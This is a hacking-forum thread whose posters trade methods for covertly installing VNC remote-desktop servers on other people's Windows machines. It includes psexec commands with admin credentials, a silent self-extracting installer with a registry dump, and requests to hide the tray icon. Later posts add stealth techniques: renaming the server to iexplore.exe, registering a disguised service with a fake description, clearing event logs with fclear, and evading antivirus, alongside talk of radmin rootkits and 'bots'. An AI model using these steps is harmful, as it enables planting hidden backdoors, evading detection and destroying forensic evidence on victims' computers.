[manu]

Hey,

This is what I do... It may be helpful to newbies..

To do this, you need the following files.

1. omnithread_rt.dll
2. VNCHooks.dll
3. winvnc.exe
4. vnc.reg
5. reg.exe

and

6. vncviewer.exe

and

7. psexec.exe (from Sysinternals pstools)

Put all these files inside your C:\VNC folder

Follow these steps below to install it on remote machine..

1. Get the Ip of remote Pc and a Valid admin username and Password.
2. Make a netbios connection and upload 1-5 files to remote C:\VNC folder
3. Go to your Command prompt
4. Run PSEXEC command

eg: --- >

C:\> cd vnc
C:\Vnc> psexec \\computer_ip -u adminusername -p password "c:\vnc\reg.exe" import vnc.reg
Then you will get a notification that "The operation completed successfully"
C:\Vnc> psexec \\computer_ip -u adminusername -p password "c:\vnc\winvnc.exe" -install
well, after its succefully done, then you should start the service
C:\Vnc> psexec \\computer_ip -u adminusername -p password net start winvnc

Well, your service should be started now, you will get the notification "VNC Server service is started"

Well, now Run Vncviewer.exe from your machine, it will ask you the IP of remote machine and then password which you set in the REG file, as soon as you enter it, you got the remote machines desktop in front of you.. :)

Note--: The password is a must, you should set your password in that REG file... Actually I had problems with it, If any friends here could tell how to make the REG file for this purpose, please contribute here...

And, I had seen another file "omnithread2_rt.dll" is been used, but I didnt use it, I dont know why people using it, I got the result anyway...

And one more thing guys, I will upload those files I mentioned above... But, when you install the service, you can see a TASKBAR ICON... It will be good if somebody could edit winvnc.exe to hide this, source code is available on the net...

So, to make it work nice, I need you ppls help, I will upload REG.EXE., Vncviewer..exe, omnithread_rt.dll, psexec.exe and VNCHooks.dll here.... Remaining two files "vnc.reg" and "winvnc.exe" needs to be edited, and I am damn sure that my friends here could easily contribute... So, anybody can upload those files..!! I havent got omnithread2_rt.dll from the net, Actually they are asking 10$ to download it which I am not interested, so, well, that file also will be handy if you ppl upload it...

Regards,
Manu :)

Heres the ZIP file which contains those 5 files only..!

Attached File(s)

•  VNC.zip (275.97K)
  Number of downloads: 324

[da_cash]

Knowledge is always helpfull not only for newbies...( it's my opinion..:P )


thx manu ..another quality post from U..

[FuzZyBeeR]

:) really nice tut :) Read something about it but never a clear howto for setting up a vnc like this. Great work! :rolleyes:

[manu]

:lol: Guys, this is nothing.. You can make a simple batch file instead of typing everything.. I just put a little explanatiion for you to get the idea.. That is all..

Nobody told anything about VNC.REG and WINVNC.EXE editing to hide the Taskbar Icon :( :( :(

Anyway I am glad it is useful to some guys here :)
Manu :)

[Stephen79]

I use VNC for work, I created a simple WinRAR exe that sets everything up. VNC does require a reboot though.

;files req
wm_hooks.dll
winvnc4.exe
vnc79.bat
reg.reg

;The comment below contains SFX script commands

Setup=vnc79.bat
Silent=1
Overwrite=1
Title=VNC Remote Installer Steve

;batile

:make
md �c:\program files\RealVNC\VNC4

:move
move reg.reg c:\program files\RealVNC\VNC4

:registry

reg.reg /S

EXIT

;Regimp.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\RealVNC]

[HKEY_CURRENT_USER\Software\RealVNC\VNCViewer4]
"dummy"=""

[HKEY_CURRENT_USER\Software\RealVNC\VNCViewer4\MRU]


[HKEY_CURRENT_USER\Software\RealVNC\WinVNC4]
"Password"=hex:c4,da,62,1d,24,31,35,16
"SecurityTypes"="VncAuth"
"ReverseSecurityTypes"="None"
"QueryConnect"=dword:00000000
"PortNumber"=dword:00001245
"LocalHost"=dword:00000000
"IdleTimeout"=dword:00000e10
"HTTPPortNumber"=dword:00001245
"Hosts"="+,"
"AcceptKeyEvents"=dword:00000001
"AcceptPointerEvents"=dword:00000001
"AcceptCutText"=dword:00000001
"SendCutText"=dword:00000001
"DisableLocalInputs"=dword:00000000
"DisconnectClients"=dword:00000001
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectAction"="None"
"RemoveWallpaper"=dword:00000001
"RemovePattern"=dword:00000001
"DisableEffects"=dword:00000001
"UseHooks"=dword:00000001
"PollConsoleWindows"=dword:00000001
"CompareFB"=dword:00000001
"Protocol3.3"=dword:00000000
"dummy"=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinVNC4]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,\
 �6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,52,00,65,00,61,00,6c,00,56,\
 �00,4e,00,43,00,5c,00,56,00,4e,00,43,00,34,00,5c,00,57,00,69,00,6e,00,56,00,\
 �4e,00,43,00,34,00,2e,00,65,00,78,00,65,00,22,00,20,00,2d,00,73,00,65,00,72,\
 �00,76,00,69,00,63,00,65,00,00,00
"DisplayName"="VNC Server Version 4"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinVNC4\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\
 �00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
 �00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\
 �05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
 �20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\
 �00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\
 �00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinVNC4\Enum]
"0"="Root\\LEGACY_WINVNC4\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

^just set your port and pass keys and away you go.

/I have used a dummy port and pass btw!

[manu]

Quote

VNC does require a reboot though.

Doest it????? ... I got it with out reboot... <_<

Manu :)

[Stephen79]

manu, on Oct 26 2004, 11:03 AM, said:

Quote

VNC does require a reboot though.

Doest it????? ... I got it with out reboot... <_<

Manu :)

<{POST_SNAPBACK}>

does on the version I use on our network. (WINvnc 4.0.0.26)

^ The reason I use the above version is that I compressed the size down a fair bit, and it only needs one dependancy wm_hooks.dll

[manu]

Actually I am using TightVNC ..!!

But the thing is when I start the Service remotely using PSEXEC, It pops up and says "The password is not set, blah blah" on the remote machines screen... I think my .REG file is not set properly... Damn, where did i go wrong..

Manu :(

[SkitZZ]

hey manu check this site out might help.

Quote

You need to get a copy of the files required by VNC. You can download them here. The VNC executable that I've provided has the added feature of not displaying the VNC icon in the system tray while it's running.

hxxp://guh.nu/projects/vnc/

and some more general info on this site

hxxp://www.digitaloffense.net/docs/Remote.VNC/remote_installation.txt

SkitZZ

[krackatoa]

Check file uploads for an easier way to remotely install vnc

[dark101]

Alright some ideas come to mind when i found this topic floating around. What ever reason would you be using a version of vnc that hides the exe in the systray unless you are trying to hide it from the user. When thinking about the suggested methods of installation i become worried since anyone with a basic understanding of windows could notice the exe running or the service named winvnc4 when the -register/install command is used for an install. Also it seems everyone is having fun posting all of these registry keys that you need in order to install/run vnc, when in reality the only key vnc needs to function is the password.
Suggestions..
1. The winvnc service runs by using the "winvnc.exe -service" command there is no reason to keep it the same exe since "iexplore.exe -service" works just as well.
2. Method of installation kinda boggles the mind, there are two options i see here firedaemon or a service app that would allow you to do something like this in a command prompt
serv.exe INSTALL AtrickyServiceName /n:"Service's Display Name" /b:%systemroot%\settings\iexplore.exe /u:LocalSystem /s:AUTO /i:yes
3. One you have a service register then the only keys in the registry you need are the password... Which can be added with an app like dtreg
dtreg -AddKey \HKLM\Software\RealVNC
dtreg -AddKey \HKLM\Software\RealVNC\winvnc4
dtreg -Set REG_BINARY \HKLM\Software\RealVNC\winvnc4\Password=somehexnumbers
dtreg -AddKey \HKCU\Software\RealVNC
dtreg -AddKey \HKCU\Software\RealVNC\winvnc4
dtreg -Set REG_BINARY \HKCU\Software\RealVNC\winvnc4\Password=somehexnumbers
4. It might also benefit to add a description to the service so it doesn't look so hookey, this can be done with sc.exe a tool from one of the microsoft kits like such
sc.exe description AtrickyServiceName "Required service for windows to function."
5. Finally once the service is installed you might want to clear the logs so the user doesn't notice it as being recently installed or started. This can be done in windows with a lovely tool called fclear. Simply
fclear.exe -all will do the trick
Final Note: you can use reg.exe from previous post to add registry keys, finding an app to make your passwords or knowing hex code can work to would do. If you want access to any of the other tools mentioned above send me a pm, or take some time and find them for yourself. Winrar executables work nicely for running a bat or the liken to run these commands.

[Tyler]

another post much like VNC except using radmin can be found below:
http://www.governmen...nsanity+rootkit

[dark101]

Insanity, on Feb 23 2006, 02:09 AM, said:

another post much like VNC except using radmin can be found below:
http://www.governmen...nsanity+rootkit

Well see here's the thing the required dlls for a radmin backdoor to run are picked up by almost every antivirus that exists unless you edit the manufacture name on the dll(raddrv.dll) also that tutorial is much like this one and quite basic reg imports via reg.exe are commonly picked up by antivirus whereas using an app like dtreg are rarely noticed. Also in this tutorial the password is in the bat file, many a times after cracking a servu password have i stumbled upon such a kit with the reg files left behind and the password right there for all to see. Hard to imagine why the owner of the channel lost all his bots soon afterward. Also using the r_server service name is just plain idiotic for the same reason explained above it sticks out like none other and the default service name is picked up by av.

[Tyler]

Yes, i Know, I was just showing that as another example. There are so many service daemons out there. For example Tibbar's servicedaemon he coded on the board would work for something like r_server. Also yes the password is in the bat but if you were to read clostely you would realize that in the radmin rootkit tutorial it shows you how to get the password encrpyted into the radmin.reg.

[darkened]

might help to let someone know the vnc exe posted in this thread is vulnerable to buffer overflow, ie pass can be skipped :X To fit just use the latest vnc exec from their website.